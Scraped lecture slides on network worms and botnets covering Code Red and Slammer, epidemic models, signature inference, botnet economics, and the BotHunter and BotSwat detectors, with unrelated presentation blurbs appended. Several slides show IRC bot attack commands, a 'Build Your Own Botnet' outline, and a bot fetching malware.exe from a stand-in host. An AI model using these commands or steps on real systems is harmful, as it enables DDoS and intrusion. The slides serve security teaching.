Games and the Impossibility of Realizable Ideal Functionality

Games and the Impossibility of Realizable Ideal Functionality

Spring 2008 CS 155 Network Worms and Bots John Mitchell Outline Worms Worm examples and propagation methods Detection methods Traffic patterns: EarlyBird Vulnerabilities: Generic Exploit Blocking Disabling worms Generate signatures for network or host-based filters Bots Structure and use of bots Recognizing bot propagation Recognizing bot operation

Network-based methods Host-based methods Worm A worm is self-replicating software designed to spread through the network Typically, exploit security flaws in widely used services Can cause enormous damage Launch DDOS attacks, install bot networks Access sensitive information Cause confusion by corrupting the sensitive information Worm vs Virus vs Trojan horse A virus is code embedded in a file or program Viruses and Trojan horses rely on human intervention Worms are self-contained and may spread autonomously Cost of worm attacks Morris worm, 1988 Infected approximately 6,000 machines

10% of computers connected to the Internet cost ~ $10 million in downtime and cleanup Code Red worm, July 16 2001 Direct descendant of Morris worm Infected more than 500,000 servers Programmed to go into infinite sleep mode July 28 Caused ~ $2.6 Billion in damages, Love Bug worm: $8.75 billion Statistics: Computer Economics Inc., Carlsbad, California Internet Worm (First major attack) Released November 1988 Program spread through Digital, Sun workstations

Exploited Unix security vulnerabilities VAX computers and SUN-3 workstations running versions 4.2 and 4.3 Berkeley UNIX code Consequences No immediate damage from program itself Replication and threat of damage Load on network, systems used in attack Many systems shut down to prevent further attack Some historical worms of note Worm Date Distinction Morris 11/8 8 Used multiple vulnerabilities, propagate to nearby sys ADM

5/98 Random scanning of IP address space Ramen 1/01 Exploited three vulnerabilities Lion 3/01 Stealthy, rootkit worm Cheese 6/01 Vigilante worm that secured vulnerable systems Code Red 7/01 First sig Windows worm; Completely memory resident Walk

8/01 Recompiled source code locally Nimda 9/01 Windows worm: client-to-server, c-to-c, s-to-s, Scalper 6/02 11 days after announcement of vulnerability; peer-to-peer network of compromised systems Slammer 1/03 Used a single UDP packet for explosive growth Kienzle and Elder Increasing propagation speed Code Red, July 2001

Affects Microsoft Index Server 2.0, Windows 2000 Indexing service on Windows NT 4.0. Windows 2000 that run IIS 4.0 and 5.0 Web servers Exploits known buffer overflow in Idq.dll Vulnerable population (360,000 servers) infected in 14 hours SQL Slammer, January 2003 Affects in Microsoft SQL 2000 Exploits known buffer overflow vulnerability Server Resolution service vulnerability reported June 2002 Patched released in July 2002 Bulletin MS02-39 Vulnerable population infected in less than 10 minutes Code Red Initial version released July 13, 2001

Sends its code as an HTTP request HTTP request exploits buffer overflow Malicious code is not stored in a file Placed in memory and then run When executed, Worm checks for the file C:\Notworm If file exists, the worm thread goes into infinite sleep state Creates new threads If the date is before the 20th of the month, the next 99 threads attempt to exploit more computers by targeting random IP addresses Code Red of July 13 and July 19 Initial release of July 13 1st through 20th month: Spread via random scan of 32-bit IP addr space 20th through end of each month: attack. Flooding attack against 198.137.240.91

(www.whitehouse.gov) Failure to seed random number generator linear growth Revision released July 19, 2001. White House responds to threat of flooding attack by changing the address of www.whitehouse.gov Causes Code Red to die for date 20th of the month. But: this time random number generator correctly seeded Slides: Vern Paxson 0 Slide: Vern Paxson Measuring activity: network telescope Monitor cross-section of Internet address space, measure traffic Backscatter from DOS floods Attackers probing blindly Random scanning from worms

LBNLs cross-section: 1/32,768 of Internet UCSD, UWiscs cross-section: 1/256. Spread of Code Red Network telescopes estimate of # infected hosts: 360K. (Beware DHCP & NAT) Course of infection fits classic logistic. Note: larger the vulnerable population, faster the worm spreads. That night ( 20th), worm dies except for hosts with inaccurate clocks! It just takes one of these to restart the worm on August 1st Slides: Vern Paxson 3 Slides: Vern Paxson 4 Code Red 2 Released August 4, 2001. Comment in code: Code Red 2. But in fact completely different code base.

Payload: a root backdoor, resilient to reboots. Bug: crashes NT, only works on Windows 2000. Localized scanning: prefers nearby addresses. Safety valve: programmed to die Oct 1, 2001. Slides: Vern Paxson Striving for Greater Virulence: Nimda Released September 18, 2001. Multi-mode spreading: attack IIS servers via infected clients email itself to address book as a virus copy itself across open network shares modifying Web pages on infected servers w/ client exploit scanning for Code Red II backdoors (!) worms form an ecosystem! Leaped across firewalls. Slides: Vern Paxson

6 Code Red 2 kills off Code Red 1 CR 1 returns thanks to bad clocks Nimda enters the ecosystem Code Red 2 settles into weekly pattern Code Red 2 dies off as programmed Slides: Vern Paxson How do worms propagate? Scanning worms Worm chooses random address Coordinated scanning

Different worm instances scan different addresses Flash worms Assemble tree of vulnerable hosts in advance, propagate along tree Not observed in the wild, yet Potential for 106 hosts in < 2 sec ! [Staniford] Meta-server worm Ask server for hosts to infect (e.g., Google for powered by phpbb) Topological worm: Use information from infected hosts (web server logs, email address books, config files, SSH known hosts) Contagion worm Propagate parasitically along with normally initiated communication 8

How fast are scanning worms? Model propagation as infectious epidemic Simplest version: Homogeneous random contacts N: population size S(t): susceptible hosts at time t I(t): infected hosts at time t : contact rate i(t): I(t)/N, s(t): S(t)/N dI IS dt N dS IS dt N di i (1 i ) dt courtesy Paxson, Staniford, Weaver

e (t T ) i (t ) 1 e (t T ) 9 Shortcomings of simplified model Prediction is faster than observed propagation Possible reasons Model ignores infection time, network delays Ignores reduction in vulnerable hosts by patching Model supports unrealistic conclusions Example: When the Top-100 ISPs deploy containment strategies, they still can not prevent a worm spreading at 100 probes/sec from affecting 18% of the internet, no matter what the reaction time of the system towards containment 0 Analytical Active Worm Propagation

Model [Chen et al., Infocom 2003] More detailed discrete time model Assume infection propagates in one time step Notation N number of vulnerable machines h hitlist: number of infected hosts at start s scanning rate: # of machines scanned per infection d death rate: infections detected and eliminated p patching rate: vulnerable machines become invulnerable At time i, ni are infected and mi are vulnerable Discrete time difference equation Guess random IP addr, so infection probability (mi-ni)/232

Number infected reduced by pni + dni Effect of parameters on propagation 1. HitList Size 2. Patching Rate 3.Time to Complete Infection (Plots are for 1M vulnerable machines, 100 scans/sec, death rate 0.001/second Other models: Wang et al, Modeling Timing Parameters , WORM 04 (includes delay) Ganesh et al, The Effect of Network Topology , Infocom 2005 (topology) Worm Detection and Defense Detect via honeyfarms: collections of honeypots fed by a network telescope. Any outbound connection from honeyfarm = worm. (at least, thats the theory) Distill signature from inbound/outbound traffic.

If telescope covers N addresses, expect detection when worm has infected 1/N of population. Thwart via scan suppressors: network elements that block traffic from hosts that make failed connection attempts to too many other hosts 5 minutes to several weeks to write a signature Several hours or more for testing 3 Current threats can spread faster than defenses can reaction Manual capture/analyze/signature/rollout model too slow Program Macro months days hrs Viruses E-mail Worms

Viruses Preautomation mins Contagion Period Signature Response Period secs 1990 Time Network Worms Postautomation Flash Worms Signature Response Period Contagion Period Need for automation 2005

Slide: Carey Nachenberg, Symantec 4 Signature inference Challenge need to automatically learn a content signature for each new worm potentially in less than a second! Some proposed solutions Singh et al, Automated Worm Fingerprinting, OSDI 04 Kim et al, Autograph: Toward Automated, Distributed Worm Signature Detection, USENIX Sec 04 Signature inference Monitor network and look for strings common to traffic with worm-like behavior Signatures can then be used for content filtering

Slide: S Savage 6 Content sifting Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm (true today, not tomorrow...) Two consequences Content Prevalence: W will be more common in traffic than other bitstrings of the same length Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations Content sifting: find Ws with high content prevalence and high address dispersion and drop that traffic Slide: S Savage Cumulative fraction of signatures Observation: High-prevalence strings are rare 1 0.998

0.996 0.994 0.992 0.99 Only 0.6% of the 40 byte substrings repeat more than 3 times in a minute 0.988 0.986 0.984 1 10 100 1000 10000 Number of repeats (Stefan Savage, UCSD *) 100000 8

The basic algorithm Detector in network A B C cnn.com E Prevalence Table (Stefan Savage, UCSD *) D Address Dispersion Table Sources Destinations The basic algorithm Detector in network A B C cnn.com

E D Prevalence Table 9 (Stefan Savage, UCSD *) 1 Address Dispersion Table Sources Destinations 1 (A) 1 (B) The basic algorithm Detector in network A B C cnn.com E

D Prevalence Table 0 (Stefan Savage, UCSD *) 1 1 Address Dispersion Table Sources Destinations 1 (A) 1 (C) 1 (B) 1 (A) The basic algorithm Detector in network A B C cnn.com

E D Prevalence Table 2 1 (Stefan Savage, UCSD *) Address Dispersion Table Sources Destinations 2 (A,B) 1 (C) 2 (B,D) 1 (A) The basic algorithm Detector in network A B C cnn.com

E D Prevalence Table 3 1 (Stefan Savage, UCSD *) Address Dispersion Table Sources Destinations 3 (A,B,D) 3 (B,D,E) 1 (C) 1 (A) Challenges Computation To support a 1Gbps line rate we have 12us to process each packet, at 10Gbps 1.2us, at 40Gbps Dominated by memory references; state expensive

Content sifting requires looking at every byte in a packet State On a fully-loaded 1Gbps link a nave implementation can easily consume 100MB/sec for table Computation/memory duality: on high-speed (ASIC) implementation, latency requirements may limit state to on-chip SRAM 3 (Stefan Savage, UCSD *) Which substrings to index? Approach 1: Index all substrings Way too many substrings too much computation too much state Approach 2: Index whole packet Very fast but trivially evadable (e.g., Witty, Email Viruses) Approach 3: Index all contiguous substrings of a fixed length S Can capture all signatures of length S and larger A B C D E F G H I J K

4 (Stefan Savage, UCSD *) How to represent substrings? Store hash instead of literal to reduce state Incremental hash to reduce computation Rabin fingerprint is one such efficient incremental hash function [Rabin81,Manber94] P1 One multiplication, addition and mask per byte R A N D A B C D O M Fingerprint = 11000000 P2 R A B C D A N D O M Fingerprint = 11000000 (Stefan Savage, UCSD *) How to subsample? Approach 1: sample packets If we chose 1 in N, detection will be slowed by N

Approach 2: sample at particular byte offsets Susceptible to simple evasion attacks No guarantee that we will sample same substring in every packet Approach 3: sample based on the hash of the substring 6 (Stefan Savage, UCSD *) Finding heavy hitters via Multistage Filters Hash 1 Increment Counters Stage 1 Field Extraction Hash 2 Comparator Stage 2

Comparator Hash 3 Stage 3 Comparator (Stefan Savage, UCSD *) ALERT ! If all counters above threshold Multistage filters in action Counters ... Grey = other hahes Yellow = rare hash Threshold Stage 1 Green = common hash 8 (Stefan Savage, UCSD *)

Stage 2 Stage 3 High address dispersion is rare too Nave implementation might maintain a list of sources (or destinations) for each string hash But dispersion only matters if its over threshold Approximate counting may suffice Trades accuracy for state in data structure Scalable Bitmap Counters Similar to multi-resolution bitmaps [Estan03] Reduce memory by 5x for modest accuracy error 9 (Stefan Savage, UCSD *) Scalable Bitmap Counters 1 1 Hash(Source) Hash : based on Source (or Destination) Sample : keep only a sample of the bitmap Estimate : scale up sampled count Adapt : periodically increase scaling factor numBitmaps

Error Factor = 2/(2 -1) With 3, 32-bit bitmaps, error factor = 28.5% 0 (Stefan Savage, UCSD *) Content sifting summary Index fixed-length substrings using incremental hashes Subsample hashes as function of hash value Multi-stage filters to filter out uncommon strings Scalable bitmaps to tell if number of distinct addresses per hash crosses threshold This is fast enough to implement (Stefan Savage, UCSD *) Experience Quite good. Detected and automatically generated signatures for every known worm outbreak over eight months Can produce a precise signature for a new worm in a fraction of a second

Software implementation keeps up with 200Mbps Known worms detected: Code Red, Nimda, WebDav, Slammer, Opaserv, Unknown worms (with no public signatures) detected: MsBlaster, Bagle, Sasser, Kibvu, (Stefan Savage, UCSD *) False Positives Common protocol headers Mainly HTTP and SMTP headers Distributed (P2P) system protocol headers Procedural whitelist Small number of popular

protocols Non-worm epidemic Activity SPAM BitTorrent 3 (Stefan Savage, UCSD *) GNUTELLA.CONNECT /0.6..X-Max-TTL: .3..X-Dynamic-Qu erying:.0.1..X-V ersion:.4.0.4..X -Query-Routing:. 0.1..User-Agent: .LimeWire/4.0.6. .Vendor-Message: .0.1..X-Ultrapee r-Query-Routing: 4 Generic Exploit Blocking Idea

Write a network IPS signature to generically detect and block all future attacks on a vulnerability Different from writing a signature for a specific exploit! Step #1: Characterize the vulnerability shape Identify fields, services or protocol states that must be present in attack traffic to exploit the vulnerability Identify data footprint size required to exploit the vulnerability Identify locality of data footprint; will it be localized or spread across the flow? Step #2: Write a generic signature that can detect data that mates with the vulnerability shape Similar to Shield research from Microsoft Slide: Carey Nachenberg, Symante Generic Exploit Blocking Example #1

Consider MS02-039 Vulnerability (SQL Buffer Overflow): Field/service/protocol UDP port 1434 Packet type: 4 Minimum data footprint Packet size > 60 bytes Data Localization Limited to a single packet BEGIN Pseudo-signature: DESCRIPTION: MS02-039 NAME: MS SQL Vuln if (packet.port()UDP == 1434 && TRANSIT-TYPE: TRIGGER: ANY:ANY->ANY:1434 packet[0] == 4 && OFFSET: 0, PACKET packet.size() > 60) SIG-BEGIN { "\x04

report_exploit(MS02-039); } " SIG-END END Slide: Carey Nachenberg, Symante 6 Generic Exploit Blocking Example #2 Consider MS03-026 Vulnerability (RPC Buffer Overflow): Field/service/protocol RPC request on TCP/UDP 135 szName field in CoGetInstanceFromFile func. Minimum data footprint Arguments > 62 bytes Data Localization Limited to 256 bytes from start of RPC bind command BEGIN DESCRIPTION: MS03-026 Sample signature:

NAME: RPC Vulnerability TRANSIT-TYPE: TCP, UDP if (port ==ANY:ANY->ANY:135 135 && TRIGGER: type == request && SIG-BEGIN func == CoGetInstanceFromFile && "\x05\x00\x0B\x03\x10\x00\x00 parameters.length() > 62) (about 50 more bytes...) { \x00\x00.*\x05\x00 report_exploit(MS03-026); } " SIG-END END Slide: Carey Nachenberg, Symante Worm summary Worm attacks Many ways for worms to propagate

Propagation time is increasing Polymorphic worms, other barriers to detection Detect Traffic patterns: EarlyBird Watch attack: TaintCheck and Sting Look at vulnerabilities: Generic Exploit Blocking Disable Generate worm signatures and use in network or host-based filters 8 Botnet Collection of compromised hosts Spread like worms and viruses Once installed, respond to remote commands Platform for many attacks

Spam forwarding (70% of all spam?) Click fraud Keystroke logging Distributed denial of service attacks Serious problem Top concern of banks, online merchants Vint Cerf: of hosts connected to Internet 9 What are botnets used for? capability ago DSNX create port redirect other proxy

download file from web DNS resolution UDP/ping floods other DDoS floods scan/spread spam visit URL

evil G-SyS sd Spy

Capabilities are exercised via remote commands. 0 Building a Bot Network compromise attempt compromise attempt Win XP

FreeBSD Attacker compromise attempt compromise attempt Mac OS X Win XP Building a Bot Network compromise attempt install bot software compromise attempt Win XP compromised FreeBSD Attacker compromise attempt compromise attempt install bot software Mac OS X

Win XP compromised Step 2 Win XP Win XP Win XP . . . . . . . . . /connect jade.va.us.dal.net /connect jade.va.us.dal.net /connect jade.va.us.dal.net /join #hacker /join #hacker

/join #hacker . . . . . . . . . jade.va.dal.net 3 Step 3 (12:59:27pm) -- A9-pcgbdv ([email protected]) has joined (#owned) Users : 1646 (12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62 (12:59:27pm) -- A6-bpxufrd ([email protected]) has joined (#owned) Users : 1647 (12:59:27pm) -- A9-nzmpah ([email protected]) has left IRC (Connection reset by peer) (12:59:28pm) (@PhaTTy) .scan.enable DCOM (12:59:28pm) -- A9-tzrkeasv ([email protected]) has joined (#owned) Users : 1650 4 Spam service Rent-a-bot Cash-out Pump and dump Botnet rental

Underground commerce Market in access to bots Botherd: Collects and manages bots Access to proxies (peas) sold to spammers, often with commercial-looking web interface Sample rates Non-exclusive access to botnet: 10 per machine Exclusive access: 25. Payment via compromised account (eg PayPal) or cash to dropbox Identity Theft Keystroke logging Complete identities available for $25 - $200+ Rates depend on financial situation of compromised person Include all info from PC files, plus all websites of interest with passwords/account info used by PC owner

At $200+, usually includes full credit report [Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ] 6 Sobig.a In Action Arrives as an email attachment Written in C++ Encrypted with Telock to slow analysis User opens attachment, launching trojan Downloads file from a free Geocities account Contains list of URLs pointing to second stage Fetches second-stage trojan Arbitrary executable file could be anything For Sobig.a, second-stage trojan is Lala Stage 2 Lala Communication

Lala notifies a cgi script on a compromised host Different versions of Lala have different sites and cgi scripts, perhaps indicating tracking by author Installation Lala installs a keylogger and password-protected Lithium remote access trojan. Lala downloads Stage 3 trojan Wingate proxy (commercial software) Cleanup Lala removes the Sobig.a trojan 8 Stage 3 Wingate Wingate is a general-purpose port proxy server

555/TCP RTSP Service 1180/TCP SOCKS 1182/TCP WWW Proxy 1184/TCP POP3 Proxy 608/TCP Remote Control 1181/TCP Telnet Proxy 1183/TCP FTP Proxy 1185/TCP SMTP Server Final state of compromised machine Complete remote control by Lithium client with password adm123 Complete logging of users keystrokes Usable for spam relay, http redirects Wingate Gatekeeper client can connect to 608/TCP, can log/change everything 9 Build Your Own Botnet Pick a vector mechanism

IRC Channels: DCC Filesends, Website Adverts to Exploit Sites Scan & Sploit: MSBlast Trojan: SoBig/BugBear/ActiveX Exploits Choose a Payload Backdoors Agobot, SubSeven, DeepThroat Most include mechanisms for DDoS, Self-spreading, download/exec arbitrary code, password stealers. Do it Compromise an IRC server, or use your own zombied machines Configure Payload to connect to selected server Load encryption keys and codes Release through appropriate compromised systems Sit back and wait, or start on your next Botnet [Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ] 0

Bot detection methods Signature-based (most AV products) Rule-based Monitor outbound network connections (e.g. ZoneAlarm, BINDER) Block certain ports (25, 6667, ...) Hybrid: content-based filtering Match network packet contents to known command strings (keywords) E.g. Gaobot ddos cmds: .ddos.httpflood Network traffic monitoring Wenke Lee, Phil Porras: Bot Hunter, Correlate various NIDS alarms to identify bot infection sequence GA Tech: Recognize traffic patterns associated with ddns-based rallying Stuart Staniford, FireEye Detect port scanning to identify suspicious traffic

Emulate host with taint tracking to identify exploit BotHunter: passive bot detection What is botHunter? What is botHunter? botHunter Sensors Introduction Correlation Framework A Real Case Study Approaches to Privacy-Preserving Correlation Behavior-based Correlation Example botHunter Output Cyber-TA Distributed Correlation Example botHunter Architectural Overview Cyber-TA Integration Snort-based sensor suite for malware event detection inbound scan detection remote to local exploit detection

anomaly detection system for exploits over key TCP protocols Botnet specific egg download banners, Victim-to-C&C-based communications exchanges particularly for IRC bot protocols Event correlator combines information from sensors to recognize bots that infect and coordinate with your internal network assets Submits bot-detection profiles to the Cyber-TA repository infrastructure Infection lifecycle A Behavioral-based Approach V-2-A A-2-V E2: Inbound Infection * 2 II V pe E1: Inbound

Scan A-2-V Ty E5: Outbound Scan Type V-2* Search for duplex communication sequences that are indicative of infectioncoordination-infection lifecycle I E3: Egg Download V-2-C E4: C&C Comms What is botHunter? botHunter Sensors Introduction Correlation Framework A Real Case Study

Approaches to Privacy-Preserving Correlation Behavior-based Correlation Example botHunter Output Cyber-TA Distributed Correlation Example botHunter Architectural Overview Cyber-TA Integration Phatbot infection lifecycle ot infection case study: Phatbot 3 A: Attack, V: Victim, C: C&C Server E1: A.* V.{2745, 135, 1025, 445, 3127, 6129, 139, 5000} (Bagle, DCOM2, DCOM, NETBIOS, DOOM, DW, NETBIOS, UPNPTCP connections w/out content transfers) E2: A.* V.135 (Windows DCE RCP exploit in payload) E3: V.* A.31373 (transfer a relatively large file via random A port specified by exploit) E4: V.* C.6668 (connect to an IRC server) E5: V.* V.{2745, 135, 1025, 445, 3127, 6129, 139, 5000} (V begins search for infection targets, listens on 11759 for

captured innew a controlled VMWare environment future egg downloads) BotHunter System Architecture Botnets: Architecture Overview 4 What is botHunter? botHunter Sensors A Real Case Study Correlation Framework Behavior-based Correlation Example botHunter Output Architectural Overview Cyber-TA Integration Snort 2.6.0 bothunter.config spp_scade.c|h SLADE e1: Inbound Malware Scans

Span Port to spp_scade.c|h Ethernet Device SCADE Signature Engine e2: Payload Anomalies botHunter Ruleset e5: Outbound Scans e2: Exploits e3: Egg Downloads e4: C&C Traffic C T A P A S R N S O E R R T

bothunter.XML CTA Anonymizer Plugin botHunter Correlator Java 1.4.2 bot Infection Profile: Confidence Score Victim IP Attacker IP List (by confidence) Coordination Center IP (by confidence) Full Evidence Trail: Sigs, Scores, Ports Infection Time Range Snort +2.6.0, OS: Linux, MacOS, Win, FreeBSD, Solaris, Java What is botHunter? A Real Case Study Behavior-based Correlation Architectural Overview botHunter Sensors Correlation Framework Example botHunter Output Cyber-TA Integration

botHunter Signature Set Replace standard snort rules Five custom rulesets: e[1-5].rules Scope known worm/bot exploit general traffic signatures, shell/code/script exploits, update/download/registered rules, C&C command exchanges, outbound scans, malware exploits Rule sources Bleeding Edge malware rulesets Snort Community Rules, Snort Registered Free Set Cyber-TA Custom bot-specific rules Current Set: 237 rules, operating on SRI/CSL and GA-Tech networks, relative low false positive rate What is botHunter? A Real Case Study Behavior-based Correlation Architectural Overview

botHunter Sensors Correlation Framework Example botHunter Output Cyber-TA Integration Detection botHunter - Correlation Framework Bot-State Correlation Data Structure 6 VictimIP E1 E2 E3 E4 E5 Score Characteristics of Bot Declarations states are triggered in any order, but pruning timer reinitializes row state

once an InitTime Trigger is activated external stimulus alone cannot trigger bot alert 2 x internal bot behavior triggers bot alert Rows: Valid Internal Home_Net IP Colums: Bot infection stages Entry: IP addresses that contributed alerts to E-Column Score Column: Cumulative score for per Row Threshold (row_score > threshold) declare bot InitTime Triggers An event that initiate pruning timer Pruning Timer Seconds remaining until a row is reinitialized When bot alert is declared, IP addresses are assigned responsibility based on raw contribution Defaults: E1 Inbound scan detected E2 Inbound exploit detected = .25 E3 Egg download detected E4 C&C channel detected E5 Outbound scan detected = .50

Threshold = 1.0 Pruning Interval = 120 seconds weight = .25 weight weight = .50 weight = .50 weight Botnets network traffic patterns Unique characteristic: rallying Bots spread like worms and trojans Payloads may be common backdoors Centralized control of botnet is characteristic feature Georgia Tech idea: DNS Bots installed at network edge IP addresses may vary, use Dynamic DNS Bots talk to controller, make DDNS lookup Pattern of DDNS lookup is easy to spot for common

botnets! David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard, Wenke Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass) 8 68 9 69 0 BotSwat Host-based bot detection Based on idea of remote control commands What does remote control look like? http.execute Invoke system calls: connect, network send and recv, create file, write file, On arguments received over the network:

IP to connect to, object to request, file name, Botswat premise We can distinguish the behavior of bots from that of innocuous processes via detecting remote control We can approximate remote control as using data received over the network in a system call argument http.execute www.badguy.com/malware.exe C:\WIN\bad.exe agobot 1 3 4 connect(,www.badguy.com,) 5 send( ,GET /malware.exe,) 7 fcreate(,C:\WIN\malware.exe,) 8 2 Windows XP NIC 6 3

S O U R C E S ? S I N K S bind() ? BotSwat CreateProcessA() ? NtCreateFile() ?

... 4 BotSwat architecture: overview Interposition mechanism (detours) Interposes on API calls Tainting module Instantiates and propagates taint User-input module Tracks local user input as received via KB or mouse (clean data); propagates cleanliness Behavior checking Monitors invocations of selected system calls Queries tainting and user-input modules Determines whether to flag invocation

~70k lines C++ and ~2200 intercepted fxns Library-call level tainting Intercept calls made by process via a DLL to memory-copying functions If C library functions statically linked in (STAT), we wont see run-time calls to these functions Handling visibility limitations Taint a mem region on basis of its contents Keep track of data received over the network Taint propagation modes: Cause-and-Effect (C&E) conservative Correlative (CORR) liberal 6 User input tracking Goal: Identify actions initiated by local app user

Challenge: data value associated with mouse input heavily application-defined; not exposed via API call or similar Solution: consider all data values referred to by app while it is handling mouse input event clean (an over-approximation) Figure out when app handling input event System creates message M MainWndProc(, UINT uMsg,){ switch (uMsg) { case WM_LBUTTONDOWN: ... ... } ... App executes code to handle event DispatchMessage(...) Target Window: W Input Type: LMB click Location: System posts M to threads queue M1 App reads M from queue

GetMessage(...) M2 M3 8 Behaviors and gates tainted open file NtOpenFile tainted create file tainted prog exec NtCreateFile ... CreateFile{A,W}, OpenFile, CopyFile{Ex}{A,W}, fopen, _open, _lopen, _lcreat, ... bind tainted IP bind tainted port ... tainted send MoveFile{Ex}{A,W}

Win32DeleteFile MoveFileWithProgress{Ex}{A,W} DeleteFile{A,W} ReplaceFile{A,W} NtDeviceIoControlFile derived send sendto tainted IP sendto tainted port bind, send, sendto, WSASend, WSASendTo, SSL_write, Selection of behaviors/gates/sinks: informed by bot capabilities 9 Evaluation of BotSwat Bots: ago, DSNX, evil, G-SyS, sd, Spy Two test scenarios C library functions dynamically or statically linked

Many bot variants Apply xforms (compr, encr) to bot binary Minor source edits (C&C params, config data) Variants from ago, sd, & Spy families: 98.2% of all bots seen in wild (05) Eight benign programs web browser; clients: email, ftp, ssh, chat, AV signature updater; IRC server Chosen as likely to exhibit behavior similar to bots 0 Results overview Detected execution of most candidate cmds Detected vast majority of bots remote control behavior even when couldnt see bots calls to memory-copying functions # behaviors exhibited:

# behavs detected (DYN, C&E): # behavs detected (STAT, CORR): 207 Tested 8 benign progs; not many FPs Under CORR: 8 behaviors; 5 different 196 148 Detected commands capability ago port redirect other proxy web download

DNS resolution UDP/ping floods oth DDoS floods scan/spread spam visit URL DSNX evil G-SyS sd

Spy

capability ago DSNX evil G-SyS sd kill process open/exec file keylogging

Spy create dir delete file/dir list dir move file/dir

DCC send file act as http svr change C&C svr create clone clone attacks

create spy 3 + + + killprocess delete + rename + + makedir redirect list

+ + get (DCC) + syn

+ kill proc bind port file create execute file open Spybot (DYN, C&E) + + + + spfdsyn

Botswat summary Proof of concept Single behavior remote control detects most malicious bot actions Resilient to differences that distinguish variants (and even families) Works against bots not used in design of method Independent of command and control protocol, botnet structure Low false positive rate; can handle with whitelist or other methods Significant limitations Interposition at library call level Some bots in wild may allow only low-level system call tracking Need to decide when to raise an alarm Correlate low-level system events to identify high-level bot commands Experiment with alarm thresholds Develop malware analysis tool to produce characterization of bot actions

Instruction-level tainting for developing malspecs, evaluating detection results Efficient run-time monitor of selected applications in production environment Which processes should be monitored? How to collect, aggregate, process, and report information efficiently?

Recently Viewed Presentations

  • GEOMETRY

    GEOMETRY

    Title: GEOMETRY Author: mciuser Last modified by: Iteach User Created Date: 3/13/2003 6:08:29 AM Document presentation format: On-screen Show (4:3) Company
  • LYSOSOME - Mt. San Antonio College

    LYSOSOME - Mt. San Antonio College

    the lysosomal membrane protects the cytosol and the rest of the cell from degradative enzymes within the lysosome. the cell is protected from any lysosomal acid hydrolases that gets drain into the cytosol because the enzymes are pH sensitive and...
  • Definition One nanometer is one-millionth of a millimeter and ...

    Definition One nanometer is one-millionth of a millimeter and ...

    Methods of production of Nano Particles. II- Physical methods: Nano. alginite: Alginite is a naturally occurring rock. It is greyish-green, it has high specific surface area, high number of functional groups and high cation exchange capacity value. Nanoalginit was prepared...
  • How to create Nitrate Leaching Potential Reports from Web ...

    How to create Nitrate Leaching Potential Reports from Web ...

    An aggregated rating class is shown for each map unit. The components listed for each map unit are only those that have the same rating class as listed for the map unit. The percent composition of each component in a...
  • GAEZ Data Portal - amar.maj.ir

    GAEZ Data Portal - amar.maj.ir

    to data and information, becoming a gateway global, regional and local geospatial and tabular information on agricultural resources and potential. ... Content control. GAEZ in a nutshell. Search and get information. Explore. and Analyze - Mapping .
  • Human Rights Violations in WWII

    Human Rights Violations in WWII

    Effects of Human Rights Violations in WWII. To give European Jews a safe place to live, the state of Israel was created on May 14, 1948. It was created out of the former territory of Palestine which was controlled by...
  • Vida Artificial - Miriam Ruiz

    Vida Artificial - Miriam Ruiz

    FramSticks FramSticks El objetivo es estudiar las capacidades de evolución en condiciones similares a las de la tierra, aunque simplificadas. Se usa un entorno tridimensional, representación de los organismos mediante un genoma, estructura física (cuerpo) y red neuronal (mente) definidas...
  • Class 6 - University of Rhode Island

    Class 6 - University of Rhode Island

    Hypoeutectoid Steels. Hypoeutecoid steels - less carbon than eutectoid < 0.76%. Start in single phase austenite, g, range, grains of g. Cool into two phase region, then some g transforms